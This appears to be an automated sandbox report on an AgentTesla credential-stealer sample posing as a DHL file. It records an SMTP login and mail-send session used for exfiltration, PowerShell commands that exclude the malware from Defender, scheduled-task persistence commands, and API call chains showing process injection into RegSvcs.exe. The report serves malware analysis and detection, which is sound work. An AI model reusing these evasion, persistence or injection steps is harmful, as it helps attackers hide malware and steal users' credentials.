                                              Dec 19, 2024 10:28:41.993706942 CET49713587192.168.2.10162.241.224.14AUTH login ZG9uaWFAa2VlcHRyYXZlbGluZy1lZy5jb20=
                                              Dec 19, 2024 10:28:42.362397909 CET58749713162.241.224.14192.168.2.10334 UGFzc3dvcmQ6
                                              Dec 19, 2024 10:28:42.846374035 CET58749713162.241.224.14192.168.2.10235 Authentication succeeded
                                              Dec 19, 2024 10:28:42.846599102 CET49713587192.168.2.10162.241.224.14MAIL FROM:<donia@keeptraveling-eg.com>
                                              Dec 19, 2024 10:28:43.212127924 CET58749713162.241.224.14192.168.2.10250 OK
                                              Dec 19, 2024 10:28:43.218147993 CET49713587192.168.2.10162.241.224.14RCPT TO:<mail@keeptraveling-eg.com>
                                              Dec 19, 2024 10:28:43.591236115 CET58749713162.241.224.14192.168.2.10250 Accepted
                                              Dec 19, 2024 10:28:49.322812080 CET58749718162.241.224.14192.168.2.10220-box5147.bluehost.com ESMTP Exim 4.96.2 #2 Thu, 19 Dec 2024 02:28:48 -0700
                                              220-We do not authorize the use of this system to transport unsolicited,
                                              220 and/or bulk e-mail.
                                              Dec 19, 2024 10:28:49.323024988 CET49718587192.168.2.10162.241.224.14EHLO 960781
                                              Dec 19, 2024 10:28:49.694004059 CET58749718162.241.224.14192.168.2.10250-box5147.bluehost.com Hello 960781 [8.46.123.189]
                                              250-SIZE 52428800
                                              250-8BITMIME
                                              250-PIPELINING
                                              250-PIPECONNECT
                                              250-AUTH PLAIN LOGIN
                                              250-STARTTLS
                                              250 HELP
                                              Dec 19, 2024 10:28:49.694305897 CET49718587192.168.2.10162.241.224.14AUTH login ZG9uaWFAa2VlcHRyYXZlbGluZy1lZy5jb20=
                                              Dec 19, 2024 10:28:50.062462091 CET58749718162.241.224.14192.168.2.10334 UGFzc3dvcmQ6
                                              Dec 19, 2024 10:28:50.438704014 CET58749718162.241.224.14192.168.2.10235 Authentication succeeded
                                              Dec 19, 2024 10:28:50.438916922 CET49718587192.168.2.10162.241.224.14MAIL FROM:<donia@keeptraveling-eg.com>
                                              Dec 19, 2024 10:28:50.804887056 CET58749718162.241.224.14192.168.2.10250 OK
                                              Dec 19, 2024 10:28:50.805187941 CET49718587192.168.2.10162.241.224.14RCPT TO:<mail@keeptraveling-eg.com>
                                              Dec 19, 2024 10:28:51.177762032 CET58749718162.241.224.14192.168.2.10250 Accepted
                                              Dec 19, 2024 10:28:51.191715002 CET49718587192.168.2.10162.241.224.14DATA
                                              Dec 19, 2024 10:28:51.557792902 CET58749718162.241.224.14192.168.2.10354 Enter message, ending with "." on a line by itself
                                              Dec 19, 2024 10:28:51.558602095 CET49718587192.168.2.10162.241.224.14.
                                              Dec 19, 2024 10:28:52.020623922 CET58749718162.241.224.14192.168.2.10250 OK id=1tOCpv-0027gw-1C
                                              Dec 19, 2024 10:30:27.910811901 CET49718587192.168.2.10162.241.224.14QUIT
                                              Dec 19, 2024 10:30:28.488471031 CET58749718162.241.224.14192.168.2.10221 box5147.bluehost.com closing connection

                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:04:28:27
                                              Start date:19/12/2024
                                              Path:C:\Users\user\Desktop\DHL_231437894819.bat.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\DHL_231437894819.bat.exe"
                                              Imagebase:0x830000
                                              File size:835'080 bytes
                                              MD5 hash:5D1D0F26EBB26738D78E964C0A57DE2D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1468443029.000000000478A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1468443029.000000000478A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:3
                                              Start time:04:28:32
                                              Start date:19/12/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_231437894819.bat.exe"
                                              Imagebase:0xa20000
                                              File size:433'152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:4
                                              Start time:04:28:32
                                              Start date:19/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff620390000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:5
                                              Start time:04:28:32
                                              Start date:19/12/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uvbIwIYe.exe"
                                              Imagebase:0xa20000
                                              File size:433'152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:6
                                              Start time:04:28:32
                                              Start date:19/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff620390000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:7
                                              Start time:04:28:32
                                              Start date:19/12/2024
                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uvbIwIYe" /XML "C:\Users\user\AppData\Local\Temp\tmp1E51.tmp"
                                              Imagebase:0xf20000
                                              File size:187'904 bytes
                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:8
                                              Start time:04:28:32
                                              Start date:19/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff620390000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:9
                                              Start time:04:28:33
                                              Start date:19/12/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                              Imagebase:0x330000
                                              File size:45'984 bytes
                                              MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:10
                                              Start time:04:28:33
                                              Start date:19/12/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                              Imagebase:0x920000
                                              File size:45'984 bytes
                                              MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.1534737744.0000000002C05000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.1534737744.0000000002C05000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.1534737744.0000000002C2D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.1528458706.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.1528458706.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:11
                                              Start time:04:28:35
                                              Start date:19/12/2024
                                              Path:C:\Users\user\AppData\Roaming\uvbIwIYe.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Roaming\uvbIwIYe.exe
                                              Imagebase:0xc90000
                                              File size:835'080 bytes
                                              MD5 hash:5D1D0F26EBB26738D78E964C0A57DE2D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.1557165401.00000000049BD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.1557165401.00000000049BD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.1557165401.0000000004B47000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.1557165401.0000000004B47000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Antivirus matches:
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 71%, ReversingLabs
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:12
                                              Start time:04:28:36
                                              Start date:19/12/2024
                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                              Imagebase:0x7ff6616b0000
                                              File size:496'640 bytes
                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                              Has elevated privileges:true
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:13
                                              Start time:04:28:41
                                              Start date:19/12/2024
                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uvbIwIYe" /XML "C:\Users\user\AppData\Local\Temp\tmp40DD.tmp"
                                              Imagebase:0xf20000
                                              File size:187'904 bytes
                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:14
                                              Start time:04:28:41
                                              Start date:19/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff620390000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:15
                                              Start time:04:28:41
                                              Start date:19/12/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                              Imagebase:0xa0000
                                              File size:45'984 bytes
                                              MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:16
                                              Start time:04:28:41
                                              Start date:19/12/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                              Imagebase:0xb90000
                                              File size:45'984 bytes
                                              MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.3853312298.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.3853312298.0000000002E5E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.3853312298.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.3853312298.0000000002E34000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.3853312298.0000000002E34000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Has exited:false

                                              Disassembly

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:10%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:1%
                                                Total number of Nodes:286
                                                Total number of Limit Nodes:11
                                                execution_graph 42512 6d96b98 42513 6d96bdc 42512->42513 42514 6d96be6 EnumThreadWindows 42512->42514 42513->42514 42515 6d96c18 42514->42515 42583 6d97088 42584 6d970cd MessageBoxW 42583->42584 42586 6d97114 42584->42586 42516 12b4668 42517 12b467a 42516->42517 42518 12b4686 42517->42518 42520 12b4779 42517->42520 42521 12b479d 42520->42521 42525 12b4878 42521->42525 42529 12b4888 42521->42529 42527 12b48af 42525->42527 42526 12b498c 42526->42526 42527->42526 42533 12b44b0 42527->42533 42530 12b48af 42529->42530 42531 12b498c 42530->42531 42532 12b44b0 CreateActCtxA 42530->42532 42532->42531 42534 12b5918 CreateActCtxA 42533->42534 42536 12b59db 42534->42536 42536->42536 42616 12bd4d8 42617 12bd51e 42616->42617 42621 12bd6a8 42617->42621 42624 12bd6b8 42617->42624 42618 12bd60b 42627 12bb830 42621->42627 42625 12bd6e6 42624->42625 42626 12bb830 DuplicateHandle 42624->42626 42625->42618 42626->42625 42628 12bd720 DuplicateHandle 42627->42628 42629 12bd6e6 42628->42629 42629->42618 42587 76e9b08 42588 76e9b42 42587->42588 42589 76e9bbe 42588->42589 42590 76e9bd3 42588->42590 42595 76e61a8 42589->42595 42592 76e61a8 3 API calls 42590->42592 42594 76e9be2 42592->42594 42597 76e61b3 42595->42597 42596 76e9bc9 42597->42596 42600 76ea9ba 42597->42600 42607 76ea9c8 42597->42607 42601 76ea9c6 42600->42601 42613 76e9c10 42601->42613 42603 76ea9ef 42603->42596 42605 76eaa15 CreateIconFromResourceEx 42606 76eaa96 42605->42606 42606->42596 42608 76e9c10 CreateIconFromResourceEx 42607->42608 42609 76ea9e2 42608->42609 42610 76ea9ef 42609->42610 42611 76eaa15 CreateIconFromResourceEx 42609->42611 42610->42596 42612 76eaa96 42611->42612 42612->42596 42614 76eaa18 CreateIconFromResourceEx 42613->42614 42615 76ea9e2 42614->42615 42615->42603 42615->42605 42282 6d955c0 42283 6d955d4 42282->42283 42286 6d95629 42283->42286 42287 6d9564d 42286->42287 42291 6d95680 42287->42291 42294 6d95670 42287->42294 42288 6d955e6 42298 6d956a0 42291->42298 42292 6d9569a 42292->42288 42295 6d95680 42294->42295 42297 6d956a0 OleInitialize 42295->42297 42296 6d9569a 42296->42288 42297->42296 42299 6d95713 42298->42299 42300 6d958c3 42299->42300 42303 6d95de8 42299->42303 42307 6d95dc3 42299->42307 42300->42292 42304 6d95df0 42303->42304 42311 6d941c4 42304->42311 42308 6d95de8 42307->42308 42309 6d941c4 OleInitialize 42308->42309 42310 6d95dfb 42309->42310 42310->42300 42312 6d941cf 42311->42312 42315 6d94414 42312->42315 42314 6d96249 42316 6d9441f 42315->42316 42318 6d96319 42316->42318 42319 6d95edc 42316->42319 42318->42314 42320 6d95ee7 42319->42320 42321 6d96633 42320->42321 42323 6d95ef8 42320->42323 42321->42318 42324 6d96668 OleInitialize 42323->42324 42325 6d966cc 42324->42325 42325->42321 42326 6d97460 PostMessageW 42327 6d974cc 42326->42327 42630 12bad50 42631 12bad5f 42630->42631 42634 12bae48 42630->42634 42639 12bae37 42630->42639 42635 12bae7c 42634->42635 42636 12bae59 42634->42636 42635->42631 42636->42635 42637 12bb080 GetModuleHandleW 42636->42637 42638 12bb0ad 42637->42638 42638->42631 42640 12bae7c 42639->42640 42641 12bae59 42639->42641 42640->42631 42641->42640 42642 12bb080 GetModuleHandleW 42641->42642 42643 12bb0ad 42642->42643 42643->42631 42328 6d94c65 42329 6d94b9c 42328->42329 42330 6d94bb1 42329->42330 42334 6d9969e 42329->42334 42352 6d995e0 42329->42352 42369 6d995f0 42329->42369 42335 6d9962c 42334->42335 42337 6d996a1 42334->42337 42336 6d99612 42335->42336 42386 6d9a199 42335->42386 42394 6d99a86 42335->42394 42399 6d99f85 42335->42399 42404 6d9a261 42335->42404 42412 6d99bc1 42335->42412 42420 6d99b0a 42335->42420 42424 6d99eca 42335->42424 42429 6d99d33 42335->42429 42434 6d9a0d3 42335->42434 42439 6d99cd0 42335->42439 42443 6d99bf1 42335->42443 42447 6d9a0dd 42335->42447 42451 6d99f3a 42335->42451 42459 6d99d5b 42335->42459 42336->42330 42353 6d995f0 42352->42353 42354 6d9a199 4 API calls 42353->42354 42355 6d99d5b 2 API calls 42353->42355 42356 6d99f3a 4 API calls 42353->42356 42357 6d99612 42353->42357 42358 6d9a0dd 2 API calls 42353->42358 42359 6d99bf1 2 API calls 42353->42359 42360 6d99cd0 2 API calls 42353->42360 42361 6d9a0d3 2 API calls 42353->42361 42362 6d99d33 2 API calls 42353->42362 42363 6d99eca 2 API calls 42353->42363 42364 6d99b0a 2 API calls 42353->42364 42365 6d99bc1 4 API calls 42353->42365 42366 6d9a261 4 API calls 42353->42366 42367 6d99f85 2 API calls 42353->42367 42368 6d99a86 2 API calls 42353->42368 42354->42357 42355->42357 42356->42357 42357->42330 42358->42357 42359->42357 42360->42357 42361->42357 42362->42357 42363->42357 42364->42357 42365->42357 42366->42357 42367->42357 42368->42357 42370 6d9960a 42369->42370 42371 6d9a199 4 API calls 42370->42371 42372 6d99d5b 2 API calls 42370->42372 42373 6d99f3a 4 API calls 42370->42373 42374 6d9a0dd 2 API calls 42370->42374 42375 6d99612 42370->42375 42376 6d99bf1 2 API calls 42370->42376 42377 6d99cd0 2 API calls 42370->42377 42378 6d9a0d3 2 API calls 42370->42378 42379 6d99d33 2 API calls 42370->42379 42380 6d99eca 2 API calls 42370->42380 42381 6d99b0a 2 API calls 42370->42381 42382 6d99bc1 4 API calls 42370->42382 42383 6d9a261 4 API calls 42370->42383 42384 6d99f85 2 API calls 42370->42384 42385 6d99a86 2 API calls 42370->42385 42371->42375 42372->42375 42373->42375 42374->42375 42375->42330 42376->42375 42377->42375 42378->42375 42379->42375 42380->42375 42381->42375 42382->42375 42383->42375 42384->42375 42385->42375 42387 6d99b6e 42386->42387 42388 6d9a492 42387->42388 42464 6d93638 42387->42464 42468 6d93630 42387->42468 42472 6d93b18 42388->42472 42476 6d93b20 42388->42476 42389 6d9a51c 42395 6d99a90 42394->42395 42480 6d94780 42395->42480 42484 6d94774 42395->42484 42401 6d99f9c 42399->42401 42400 6d9a14b 42488 6d944f8 42401->42488 42492 6d944f3 42401->42492 42405 6d9a273 42404->42405 42406 6d9a492 42405->42406 42410 6d93638 ResumeThread 42405->42410 42411 6d93630 ResumeThread 42405->42411 42408 6d93b18 Wow64SetThreadContext 42406->42408 42409 6d93b20 Wow64SetThreadContext 42406->42409 42407 6d9a51c 42408->42407 42409->42407 42410->42405 42411->42405 42415 6d99bc7 42412->42415 42413 6d9a492 42416 6d93b18 Wow64SetThreadContext 42413->42416 42417 6d93b20 Wow64SetThreadContext 42413->42417 42414 6d9a51c 42415->42413 42418 6d93638 ResumeThread 42415->42418 42419 6d93630 ResumeThread 42415->42419 42416->42414 42417->42414 42418->42415 42419->42415 42421 6d99b46 42420->42421 42422 6d94780 CreateProcessA 42420->42422 42423 6d94774 CreateProcessA 42420->42423 42421->42336 42422->42421 42423->42421 42425 6d99f8f 42424->42425 42427 6d944f8 WriteProcessMemory 42425->42427 42428 6d944f3 WriteProcessMemory 42425->42428 42426 6d9a14b 42427->42426 42428->42426 42430 6d99d62 42429->42430 42431 6d99d87 42430->42431 42496 6d945e8 42430->42496 42500 6d945e0 42430->42500 42435 6d9a0d6 42434->42435 42436 6d9a0fb 42435->42436 42504 6d94438 42435->42504 42508 6d94430 42435->42508 42441 6d944f8 WriteProcessMemory 42439->42441 42442 6d944f3 WriteProcessMemory 42439->42442 42440 6d99c37 42440->42336 42441->42440 42442->42440 42445 6d944f8 WriteProcessMemory 42443->42445 42446 6d944f3 WriteProcessMemory 42443->42446 42444 6d99c18 42444->42336 42445->42444 42446->42444 42449 6d94438 VirtualAllocEx 42447->42449 42450 6d94430 VirtualAllocEx 42447->42450 42448 6d9a0fb 42449->42448 42450->42448 42454 6d99f3f 42451->42454 42452 6d9a492 42457 6d93b18 Wow64SetThreadContext 42452->42457 42458 6d93b20 Wow64SetThreadContext 42452->42458 42453 6d9a51c 42454->42452 42455 6d93638 ResumeThread 42454->42455 42456 6d93630 ResumeThread 42454->42456 42455->42454 42456->42454 42457->42453 42458->42453 42460 6d99d61 42459->42460 42462 6d945e8 ReadProcessMemory 42460->42462 42463 6d945e0 ReadProcessMemory 42460->42463 42461 6d99d87 42462->42461 42463->42461 42465 6d93678 ResumeThread 42464->42465 42467 6d936a9 42465->42467 42467->42387 42469 6d93678 ResumeThread 42468->42469 42471 6d936a9 42469->42471 42471->42387 42473 6d93b65 Wow64SetThreadContext 42472->42473 42475 6d93bad 42473->42475 42475->42389 42477 6d93b65 Wow64SetThreadContext 42476->42477 42479 6d93bad 42477->42479 42479->42389 42481 6d94809 CreateProcessA 42480->42481 42483 6d949cb 42481->42483 42485 6d94777 CreateProcessA 42484->42485 42487 6d949cb 42485->42487 42487->42487 42489 6d94540 WriteProcessMemory 42488->42489 42491 6d94597 42489->42491 42491->42400 42493 6d944f8 WriteProcessMemory 42492->42493 42495 6d94597 42493->42495 42495->42400 42497 6d94633 ReadProcessMemory 42496->42497 42499 6d94677 42497->42499 42499->42431 42501 6d945e9 ReadProcessMemory 42500->42501 42503 6d94677 42501->42503 42503->42431 42505 6d94478 VirtualAllocEx 42504->42505 42507 6d944b5 42505->42507 42507->42436 42509 6d94438 VirtualAllocEx 42508->42509 42511 6d944b5 42509->42511 42511->42436 42537 76efd20 42538 76efd32 42537->42538 42543 76efd43 42538->42543 42547 7116036 42538->42547 42551 71159b4 42538->42551 42555 7116095 42538->42555 42559 7116353 42538->42559 42563 71166c1 42538->42563 42568 71171ca 42538->42568 42572 7115f46 42538->42572 42576 7117cc0 42547->42576 42579 7117cb8 42547->42579 42548 711604d 42553 7117cc0 VirtualProtect 42551->42553 42554 7117cb8 VirtualProtect 42551->42554 42552 71159e5 42553->42552 42554->42552 42557 7117cc0 VirtualProtect 42555->42557 42558 7117cb8 VirtualProtect 42555->42558 42556 71160a6 42557->42556 42558->42556 42561 7117cc0 VirtualProtect 42559->42561 42562 7117cb8 VirtualProtect 42559->42562 42560 7116367 42561->42560 42562->42560 42565 71166c4 42563->42565 42564 7116729 42565->42564 42566 7117cc0 VirtualProtect 42565->42566 42567 7117cb8 VirtualProtect 42565->42567 42566->42565 42567->42565 42570 7117cc0 VirtualProtect 42568->42570 42571 7117cb8 VirtualProtect 42568->42571 42569 71171de 42570->42569 42571->42569 42574 7117cc0 VirtualProtect 42572->42574 42575 7117cb8 VirtualProtect 42572->42575 42573 7115f5d 42574->42573 42575->42573 42577 7117d08 VirtualProtect 42576->42577 42578 7117d42 42577->42578 42578->42548 42580 7117cc0 VirtualProtect 42579->42580 42582 7117d42 42580->42582 42582->42548 42644 6d94d27 42645 6d94b9c 42644->42645 42647 6d94bb1 42644->42647 42645->42647 42648 6d9969e 12 API calls 42645->42648 42649 6d995f0 12 API calls 42645->42649 42650 6d995e0 12 API calls 42645->42650 42646 6d94d5a 42648->42646 42649->42646 42650->42646

                                                Executed Functions

                                                Function 076E61A8 Relevance: 6.9, Strings: 5, Instructions: 650COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 76e61a8-76ea028 3 76ea02e-76ea033 0->3 4 76ea50b-76ea574 0->4 3->4 5 76ea039-76ea056 3->5 12 76ea57b-76ea603 4->12 11 76ea05c-76ea060 5->11 5->12 13 76ea06f-76ea073 11->13 14 76ea062-76ea06c call 76e61b8 11->14 56 76ea60e-76ea68e 12->56 18 76ea075-76ea07f call 76e61b8 13->18 19 76ea082-76ea089 13->19 14->13 18->19 21 76ea08f-76ea0bf 19->21 22 76ea1a4-76ea1a9 19->22 33 76ea88e-76ea90e 21->33 35 76ea0c5-76ea198 call 76e61c4 * 2 21->35 25 76ea1ab-76ea1af 22->25 26 76ea1b1-76ea1b6 22->26 25->26 29 76ea1b8-76ea1bc 25->29 30 76ea1c8-76ea1f8 call 76e9bf0 * 3 26->30 29->33 34 76ea1c2-76ea1c5 29->34 30->56 57 76ea1fe-76ea201 30->57 50 76ea917-76ea934 33->50 51 76ea910-76ea916 33->51 34->30 35->22 66 76ea19a 35->66 51->50 74 76ea695-76ea717 56->74 57->56 61 76ea207-76ea209 57->61 61->56 64 76ea20f-76ea244 61->64 73 76ea24a-76ea253 64->73 64->74 66->22 75 76ea259-76ea2b3 call 76e9bf0 * 2 call 76e9c00 * 2 73->75 76 76ea3b6-76ea3ba 73->76 79 76ea71f-76ea7a1 74->79 120 76ea2c5 75->120 121 76ea2b5-76ea2be 75->121 76->79 80 76ea3c0-76ea3c4 76->80 85 76ea7a9-76ea7d6 79->85 84 76ea3ca-76ea3d0 80->84 80->85 88 76ea3d4-76ea409 84->88 89 76ea3d2 84->89 100 76ea7dd-76ea85d 85->100 94 76ea410-76ea416 88->94 89->94 99 76ea41c-76ea424 94->99 94->100 104 76ea42b-76ea42d 99->104 105 76ea426-76ea42a 99->105 156 76ea864-76ea886 100->156 110 76ea48f-76ea495 104->110 111 76ea42f-76ea453 104->111 105->104 116 76ea497-76ea4b2 110->116 117 76ea4b4-76ea4e2 110->117 140 76ea45c-76ea460 111->140 141 76ea455-76ea45a 111->141 132 76ea4ea-76ea4f6 116->132 117->132 126 76ea2c9-76ea2cb 120->126 121->126 129 76ea2c0-76ea2c3 121->129 136 76ea2cd 126->136 137 76ea2d2-76ea2d6 126->137 129->126 155 76ea4fc-76ea508 132->155 132->156 136->137 138 76ea2d8-76ea2df 137->138 139 76ea2e4-76ea2ea 137->139 143 76ea381-76ea385 138->143 146 76ea2ec-76ea2f2 139->146 147 76ea2f4-76ea2f9 139->147 140->33 150 76ea466-76ea469 140->150 144 76ea46c-76ea47d 141->144 152 76ea387-76ea3a1 143->152 153 76ea3a4-76ea3b0 143->153 191 76ea47f call 76ea9ba 144->191 192 76ea47f call 76ea9c8 144->192 154 76ea2ff-76ea305 146->154 147->154 150->144 152->153 153->75 153->76 162 76ea30b-76ea310 154->162 163 76ea307-76ea309 154->163 156->33 158 76ea485-76ea48d 158->132 167 76ea312-76ea324 162->167 163->167 168 76ea32e-76ea333 167->168 169 76ea326-76ea32c 167->169 174 76ea339-76ea340 168->174 169->174 178 76ea346 174->178 179 76ea342-76ea344 174->179 182 76ea34b-76ea356 178->182 179->182 183 76ea37a 182->183 184 76ea358-76ea35b 182->184 183->143 184->143 186 76ea35d-76ea363 184->186 187 76ea36a-76ea373 186->187 188 76ea365-76ea368 186->188 187->143 190 76ea375-76ea378 187->190 188->183 188->187 190->143 190->183 191->158 192->158
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1477163310.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_76e0000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Hq$Hq$Hq$Hq$Hq
